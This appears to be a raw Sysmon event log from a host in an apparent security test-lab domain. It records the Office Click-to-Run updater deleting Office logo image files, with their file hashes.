14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-white_scale-100.pngMD5=A7CF70D205BF4E24911F9BC1BE3A9A55,SHA256=1811AEF9698FCC521E629B9172CADED7C0531F5676F6189F12DD3C961D765977,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069084Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-black_scale-80.pngMD5=6D974EABAC816F55819EC9D80FF7C44B,SHA256=76D2AF1C2092EDE7E1F9CB20A910C746FDABF99593C714C7F120348C375CD323,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069083Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-black_scale-180.pngMD5=DC65D65E35B3D19F3A08554AF53D1BC1,SHA256=39BFF08CB104F901C6147FD9581954D12D478A60578601A211F5928A4C2C94C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069082Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-black_scale-140.pngMD5=A35D8C5C54DBE3E35B3D814A4C2BE881,SHA256=5DBE991A7499BB044019F9B06E29E800660C2EE47DC6CE156F6B8D2F853D2B8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069081Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OutlookLogo.contrast-black_scale-100.pngMD5=378280FA129E85B17488F56B5B17D556,SHA256=92AD7F5A222106986E309C098E3C175B3167149A74390BB34FD84F91F7FE574C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069080Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.scale-80.pngMD5=6B4776093A6C7B95F0EB002630FDF24D,SHA256=CE27C6E252771E689A49ACB352729B363D55C9BEBC94E5628974D5BEC89BDE9E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069079Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.scale-180.pngMD5=1BBC9EC806903B18DC7B692996C4EC2E,SHA256=5CBE63C0B63414FD8BB54E83A7288ED2524691962B58C24BD2D0289A3BB4DEEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069078Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.scale-140.pngMD5=6643CD89D2BAC4D0D27B9EDA18FBEAD5,SHA256=4AD3C34A98840C56328D4DCC5DCAAF31D8C20C297BDD66EDAC4D2C62FF039C1A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069077Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.scale-100.pngMD5=BE202178E8B1DEA4402FDC7905A88E1B,SHA256=A0519AF5743955C05D10185108AA514EDF530617627D178C4120CD1D4AFF2BD5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069076Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-80.pngMD5=73DF47627A2A8DEB6AC23BD314EAADB7,SHA256=81E56B90942AA9C1BF2135B8E8755336361AB87C5B77FCBBDFBBEEADDC5135AA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069075Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-180.pngMD5=CAD3ACAEEC0AEC1A61BE6828E1C8B93C,SHA256=8324BD68F8AACF2ADFD61377E68BB1F01EA4F4FB7F6E3A2F3CBB80FD288AFA1E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069074Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.986{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-140.pngMD5=2E38AA0240638110F36285CAA840055D,SHA256=C893C4E9D9F45E25515E85BD767408E2EAEDF84D8A8EB60048CCE400EC3E1E95,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069073Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-white_scale-100.pngMD5=735EC015D03B889667061405330D8150,SHA256=3602802E5DF25AAD6DEFFCD041B6F8A981E860AB17D647A2AD8AE798A121E1E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069072Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-80.pngMD5=A9F6F93269F2101309AC1EE0E1DE6DED,SHA256=A22D3600BDE5615FD3A63EF8747D9E656CBA6B14A36715EE07FE28B54DBE2662,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069071Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-180.pngMD5=4EABA077DD078DD198E46383E20815AA,SHA256=2E224384FED3EEA51A962FE7A2654A85137DF3E1BEACA8EFBD252A1FCEA6A124,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069070Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-140.pngMD5=C9DB64A1F884D8674ABFF7EB9D1D821A,SHA256=167F16449248875A1268F375115F98BBEF10B99F218FEA55737AF4A18E92B19F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069069Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogoSmall.contrast-black_scale-100.pngMD5=01B23714E14B8935A2CA216FA506729D,SHA256=E17959359553EC5E2EAF5D23118D3DD57EDE6E68C3EF9396B5D3D41C64BB08FE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069068Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.scale-80.pngMD5=080A542CDC87274379D8DF1B2F018DCF,SHA256=A3077343E77DDEF5456F92993C39C2784F1766814F814B638765AD6E173116E9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069067Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.scale-180.pngMD5=AEC890DD2134BBFD6A2BB802FB7DEF44,SHA256=45AB08637BA9A3CD15C5ED131D1E52BBD2D318A00071FCB0F16F9CC88F38DB8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069066Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.scale-140.pngMD5=2ABA6C94491AF7BBD7027A715B9428B9,SHA256=4EB0E565697C92892DB7A99F4257789D414D1AD5857A127DA51ACC7A499675E3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069065Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.scale-100.pngMD5=71936268DCF1F12F2DDC125E35DE7D44,SHA256=689DD127E4B2D3AE0D7D15B3B54042CB298B13188B258BA383B5241549E14113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069064Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-80.pngMD5=824A47D351AC836B76560C20D2FE316C,SHA256=0A74E63C65C918D27900847E6A7817E6E66BAD5CC646D3BE6C0A8106D89968B8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069063Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.pngMD5=871714DAC1131B6A561D567A5721EF31,SHA256=FDD86399C9E9C6AD07F661837E4D6750606F8E47DD58E5D5F1154EADA1F51B75,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069062Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-140.pngMD5=55BB93EF854C8C6A1AD0D7F95A75EE82,SHA256=88F52A95698C96192DEE1BB3BE39013E3D48480067E5F6F5D912A3749B1C137B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069061Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-100.pngMD5=9377E6CCA1F425F90F80E71D1DCC5CE2,SHA256=9F3685555FA940D403F472762250805348D5C9ACD1D7EAC3521D5C4A171D2BBC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069060Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-80.pngMD5=1BB19B361800DF2969CD1612DF6CC1CC,SHA256=DA9DC973384CD6688F236D2BDDD74D90EA7F417D95262B2FB0DB33D0DFB7A326,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069059Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-180.pngMD5=24DBF664810C6603623F838E56A60CE8,SHA256=65368CC8DAE8BD7CDD643D85F72616CB6BA030CF7A54C774AC5A28F18D12F3CE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069058Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.970{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-140.pngMD5=3DF87769F728CAC6C8C58C9CD2A7BEE1,SHA256=A7A1D9074C0BA71E07653EDA8B734EDF32F003214DCA3DD07CDB5014300970BE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069057Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\OneNoteLogo.contrast-black_scale-100.pngMD5=566585CC55FC9DFB0F21A091839EBADC,SHA256=094DB39D6AC24C50866106188CB150D5BAE5D157AB1A5D121BFFBA1D2039F34F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069056Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.scale-80.pngMD5=C437447AFE2FA4806B9ABC2F9B88B846,SHA256=EE06240C8D3EABA15A8F139CF49B7ABDE74BC28F46A85F2BBF4E7C48F9C4B526,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069055Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.scale-180.pngMD5=0F3D09A8C6CCAE88BCA493848F612C70,SHA256=DA6192F16FC2E8E062DB452BA749A221A2EDFCE2B0A76CD632B9516DAA583CCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069054Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.scale-140.pngMD5=B5B027ACD364A0566B7FDAE43C11F372,SHA256=A0722C84279BBD2C213297F0D23E7C21B033187BFB85B98B852206CF07DD1851,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069053Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.scale-100.pngMD5=BADC74E7620F1A9D23571B94E503ED3F,SHA256=C5F2B31CBA9BD24A4623B1B7E302130264501BC52EA82F902D86499A87984288,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069052Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-white_scale-80.pngMD5=F541F8AC8404F213CCF422D998611555,SHA256=71983FB0606EA94F3EDF67936CD37C46CB4BCC66590E4788259F32471E1242D8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069051Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-white_scale-180.pngMD5=92C7043AFC9BBEC0C2A8921E27166EB8,SHA256=1D37D36F28FD3EFE13A6F93BA379BC338B01654E3772275D05726BFC78EB71E2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069050Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-white_scale-140.pngMD5=E2112D78BA1214448C9FDA30CD473432,SHA256=573422D3B55DBD92A2B1A896D829F1EC82039039787A1BF842544CC1DEE4DB22,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069049Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-white_scale-100.pngMD5=E1E166297CE855F1AC0F6F0C5D2E9383,SHA256=594662795BB0275D5A7EEDA382E233113BFCAF36D3381E6526C1F78142222F04,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069048Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-black_scale-80.pngMD5=D4CCE87DFE51705B258174FDF8A302F2,SHA256=F138100BA521C719267C6AAAC3648E273F5A872D8FF82143C6C224594875E2D1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069047Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-black_scale-180.pngMD5=0A9189CBE1AEDB3EBDB7B4182A9E0268,SHA256=E2DED829DAC46B1F70CE22EB9D94B1F6AC0B9453A3B02FB13EBB93D29B66636D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069046Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-black_scale-140.pngMD5=F72BE2DBD97C930589096AE3490670DE,SHA256=D98E6C85CCA76288C144DFE6B9359A26299B3D89A9089E93D146DFE6BCA62FF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069045Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogoSmall.contrast-black_scale-100.pngMD5=4B8839A0611CF0F6A94B508BE34884B4,SHA256=6C7FB0E67EC05FE021EE97CE1141FA83401EFE4CB2ABD45FC5100A8158B63E76,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069044Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.954{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.scale-80.pngMD5=574A9FA6050A34A6C2609D4CD7634D24,SHA256=7F0B32C10C3D0BC870EDDACCD53DAD6B12B0D3EB0A3A06ED6D5823ADFED770F1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069043Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft Office\Updates\Download\PackageFiles\AD1568BC-E3CA-4B2D-8D14-276D52B3D5B5\root\Office16\LogoImages\MsPubLogo.scale-180.pngMD5=DE715CC52133ABBE6BBC9C5AB8C46E52,SHA256=B3F99C3AA5BECE00C35CEB1C5E60A24C11B2437DEA76030647DEE5D6C751B443,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000069042Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:55:20.939{A7A01FEF-EAF3-607E-6E0B-00000000BB01}5092NT AUTHORITY\SYSTEMC:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exeC:\Program Files\Microsoft 